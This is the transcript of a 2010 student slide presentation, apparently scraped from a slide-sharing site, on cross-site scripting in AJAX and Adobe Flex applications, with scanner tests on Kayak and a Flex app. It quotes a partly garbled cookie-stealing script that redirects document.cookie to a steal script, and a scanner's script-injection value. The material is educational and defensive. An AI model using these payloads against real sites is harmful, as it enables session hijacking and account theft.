Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.

Slides:



Advertisements
Similar presentations
Nick Feamster CS 6262 Spring 2009
Advertisements

Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.
Cross-site Request Forgery (CSRF) Attacks
Past, Present and Future By Eoin Keary and Jim Manico
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
Appeared in 30 th IEEE Symposium on Security and Privacy, May Authors: Mike Ter Louw and V.N. Venkatakrishnan Dept. of Computer Science: University.
Overview Environment for Internet database connectivity
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Copyright © 2004 ProsoftTraining, All Rights Reserved. Lesson 11: Advanced Web Technologies.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
Attacking and defending Flash Applications. Flash Security I’ll talk about; o RIA, Web 2.0 and Security o What is Crossdomain.xml? Why does it exist?
Modern Web Application Frameworks CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Vaibhav Rastogi and Yi Yang.  Web 2.0 – rich applications  A website hosts content it may not be responsible for  Third party gadgets  Third party.
March Intensive: XSS Exploits
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
ITM352 Javascript and Dynamic Web Pages: Client Side Processing.
Web Programming Language Dr. Ken Cosh Week 1 (Introduction)
Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.
Workshop 3 Web Application Security Li Weichao March
Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1source :
Prevent Cross-Site Scripting (XSS) attack
HTML Forms and Scripts. Session overview What are forms? Static vs dynamic Client-side scripts –JavaScript.
1 CS 3870/CS 5870 Static and Dynamic Web Pages ASP.NET and IIS.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
_______________________________________________________________________________________________________________ E-Commerce: Fundamentals and Applications1.
Session I Chapter 1 - Introduction to Web Development
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
Dynamic web content HTTP and HTML: Berners-Lee’s Basics.
Overview Web Session 3 Matakuliah: Web Database Tahun: 2008.
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.
Chapter 16 The World Wide Web. FIGURE 16.0.F01: A very, very simple Web page. Courtesy of Dr. Richard Smith.
Session 1 Chapter 1 - Introduction to Web Development ITI 133: HTML5 Desktop and Mobile Level I
Ajax for Dynamic Web Development Gregory McChesney.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
 Web pages originally static  Page is delivered exactly as stored on server  Same information displayed for all users, from all contexts  Dynamic.
JavaScript Dynamic Active Web Pages Client Side Scripting.
What Is XSS ? ! Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Overview Web Technologies Computing Science Thompson Rivers University.
Introduction to ASP.NET development. Background ASP released in 1996 ASP supported for a minimum 10 years from Windows 8 release ASP.Net 1.0 released.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Web Page Design The Basics. The Web Page A document (file) created using the HTML scripting language. A document (file) created using the HTML scripting.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
Web Programming Language
Javascript worms By Benjamin Mossé SecPro
Group 18: Chris Hood Brett Poche
Building Secure ColdFusion Applications
An Introduction to Web Application Security
Web Technologies Computing Science Thompson Rivers University
Web-Technology Exam preparation.
World Wide Web policy.
Jerrell Jackson
Web Systems & Technologies
IS 360 Course Introduction
CMP Creating Your Personal and Small Business Web Sites
HTML5 Level I Session I Chapter 1 - Introduction to Web Development
JAVASCRIPT Pam Kahl | COM 585 | Spring 2010.
Web Technologies Computing Science Thompson Rivers University
Web Site Development Careers
Client-Server Model: Requesting a Web Page
Exploring DOM-Based Cross Site Attacks
Mike Ter Louw, V.N. Venkatakrishnan University of Illinois at Chicago
Presentation transcript:

Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management

What is Cross-Site Scripting? Cross-Site Scripting, or XSS (not to be confused with CSS or Cascading Style Sheets), allows attackers to inject client-side script in a web page. The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash into an application to try to get access to sensitive information Dynamic websites (using AJAX, Flex, for example) are vulnerable. Static websites are not at risk.

Diagram of XSS Attack *From CGISecurity.com

XSS Compared to Other Vulnerabilities XSS is the #1 website security issue, with a 66% percentage likelihood that a website has the vulnerability: Statistics from WhiteHat Website Security Report, Fall 2009 edition

XSS Types Two types of XSS attacks: Nonaltering (or Non Persistent): causes no change to the page functionality Altering (or Persistent): a script injection that can be placed permanently in the database which causes change to the page functionality that will persist each time the page is requested

Non-Altering (Non-Persistant) Attacker can take a URL that contains personal data, i.e. and modify the username field by entering JavaScript to steal the cookie, altering the url to do cument.location=' kiesteal.cgi?'+document.cookie do cument.location=' kiesteal.cgi?'+document.cookie</script To diminish suspicion attacker can URL encode JavaScript so its not apparent

Altering (Persistent) Within a forum, users posts may be stored in a database, usually being tracked by a session id cookie An attacker can post a message containing malicious script, that if a user reads, may compromise their account

Threat to AJAX Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS From AJAX: The Definitive Guide: Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening. Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.

Threat to Adobe Flex Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application However Adobe, realizing the threat, has strict security in place to prevent XSS. By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application. Since Flex application is compiled into swf, it cannot itself be vulnerable to XSS The sandbox security model prevents private information being sent elsewhere.

Testing for XSS Vulnerabilities Acunetix Web Vulnerability Scanner – tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications) HP SWFScan – tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the.swf file, and then analyzes it for vulnerabilities

Testing AJAX Application Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to "+src=" /xss.js?40392">

Testing AJAX

Flex Using HP SWFScan, tested Flex application Sherwin Williams Color Visualizer ( williams.com/visualizer) williams.com/visualizer No XSS vulnerabilities were found

Testing Flex

Conclusion XSS can be both damaging and costly while compromising user security XSS is bigger risk to AJAX, due to the JavaScript and client-side scripting Flex is vulnerable but a lot more resistant due to Adobe security features Developers of both AJAX and Flex applications should check and validate any input to ensure it doesnt include script

References Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: OReilly Media WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.